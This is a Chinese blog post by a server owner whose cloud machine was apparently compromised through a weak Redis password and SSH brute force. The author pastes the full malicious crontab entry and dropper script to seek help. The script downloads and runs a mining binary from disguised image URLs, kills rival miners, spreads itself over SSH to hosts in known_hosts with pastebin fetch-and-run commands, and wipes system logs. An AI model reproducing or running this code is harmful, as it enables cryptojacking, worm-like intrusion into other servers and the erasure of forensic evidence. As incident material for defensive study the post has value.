• 服务器中了挖矿病毒


    这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,在搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。

    crontab -l
    */15 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh

    在网上找到一片文章,但是病毒代码不太相同,还是不知道怎么解决,只能重装系统,

    挖矿病毒 qW3xT.2 最终解决方案

    https://blog.csdn.net/hgx13467479678/article/details/82347473 

    我再贴上那个病毒代码吧

    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
    
    mkdir -p /tmp
    chmod 1777 /tmp
    
    ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
    ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
    rm -rf /tmp/go.sh
    rm -rf /tmp/go2.sh
    ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
    apt-get install curl -y||yum install curl -y||apk add curl -y
    apt-get install cron -y||yum install crontabs -y||apk add cron -y
    systemctl start crond
    systemctl start cron
    systemctl start crontab
    service start crond
    service start cron
    service start crontab
    
    if [ ! -f "/tmp/.X11unix" ]; then
        if [ ! -f "/usr/sbin/kerberods" ]; then
            ARCH=$(uname -m)
            if [ ${ARCH}x = "x86_64x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/vBBGdvb4 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/vBBGdvb4 -O /tmp/kerberods) && chmod +x /tmp/kerberods
            elif [ ${ARCH}x = "i686x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            else
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            fi
                /tmp/kerberods
        else
            /usr/sbin/kerberods
        fi    
    elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
        if [ ! -f "/usr/sbin/kerberods" ]; then
            ARCH=$(uname -m)
            if [ ${ARCH}x = "x86_64x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/vBBGdvb4 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/vBBGdvb4 -O /tmp/kerberods) && chmod +x /tmp/kerberods
            elif [ ${ARCH}x = "i686x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            else
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            fi
                /tmp/kerberods
        else
            /usr/sbin/kerberods
        fi
    fi
    
    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
      for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
    fi
    
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    #
  • 相关阅读:
    2017-2018-1 20179226 《文献管理与信息分析》第1讲学习总结
    2017-2018-1 20179226《Linux内核原理与分析》第十一周作业
    2017-2018-1 20179226《Linux内核原理与分析》第十周作业
    2017-2018-1 20179226 《从问题到程序》第2周学习总结
    2017-2018-1 20179226 《构建之法》第1周学习总结
    掌握一种编辑器-Vim
    2017-2018-1 20179226 《深入理解计算机系统》第1周学习总结
    2017-2018-1 20179209《Linux内核原理与分析》第二周作业
    20179209《Linux内核原理与分析》第一周作业
    linux_cpu信息查询
  • 原文地址:https://www.cnblogs.com/skyislimit/p/10700623.html
Copyright © 2020-2023  润新知